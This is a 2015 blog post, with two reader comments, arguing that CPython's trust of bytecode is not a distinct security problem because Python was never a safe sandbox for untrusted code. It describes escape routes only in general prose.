CPython's trust of bytecode is not a security problem

October 22, 2015

Yesterday I wrote about how CPython trusts bytecode so much that you can use it to read or write arbitrary memory. In comments, Ewen McNeil had a typical reaction to this:

It appears this means if you can get arbitrary Python execution (eg, unwisely trusting YAML, XML, pickle, etc...), then you can probably get arbitrary memory read/write in the Python process, which is a fairly short step away from arbitrary assembly code execution.

This is true, but it also misunderstands the security situation of Python bytecode. Even without this issue, it is game over in general if an attacker can load arbitrary bytecode into your Python process. The obvious weakness is that ctypes is part of the standard library these days and it can also be used to give you this level of access to memory without any need to corrupt the bytecode interpreter. But even without ctypes an attacker has plenty of options to achieve binary code execution. They can transfer a binary, write it out, and then execute it. They can transfer a native code Python module (in .so form), manipulate the Python load path, and then import it (which gets them code execution even in the Python process). They can run other existing vulnerable binaries on your system and exploit their bugs. And so on.

You can certainly try to stop this by creating a Python environment that blocks access to the Python features necessary for this. The problem is that there have proven to be many features that can be exploited to help here and many paths through Python to reach them. The runtime environment of Python is a complex, intertangled thing, and all attackers need is one crack that lets them bootstrap a reference to, say, the os module. And there are a lot of potential cracks.

(Python used to have a restricted execution module. As you can see, it was disabled in Python 2.3 because it had basically unfixable holes.)

The simple truth is Python is not a safe execution environment for untrusted code. The only important thing about bytecode being able to read and write arbitrary memory all by itself is that it shows how impossible the job of securing CPython is. Even if you managed to reliably cut off all access to modules and code that could be used to escape your sandbox at the Python level, you would have to audit and fix the innards of the bytecode interpreter itself to be safe.

This is why I say that this trust of bytecode is not a security problem; it doesn't really make the situation any worse than it already is. It's just an amusingly baroque alternate path to a security issue that is already there in general.


Comments on this page:

By Jeremy at 2015-10-22 12:35:49:

That restricted execution mode seems like roughly the same thing as java's java.security.AccessController and permissions system. Except java still delusionally believes that that approach is feasible.

By John Wiersba at 2015-10-23 13:19:28:

I wonder about Safe Tcl and whether or not it can avoid some of the problems you refer to?

Written on 22 October 2015.
« Python bytecode is quite heavily trusted by CPython
Perhaps it's a good idea to reboot everything periodically »

Page tools: View Source, View Normal, Add Comment.
Search:
Login: Password:
Atom Syndication: Recent Comments.

Last modified: Thu Oct 22 00:12:41 2015
This dinky wiki is brought to you by the Insane Hackers Guild, Python sub-branch.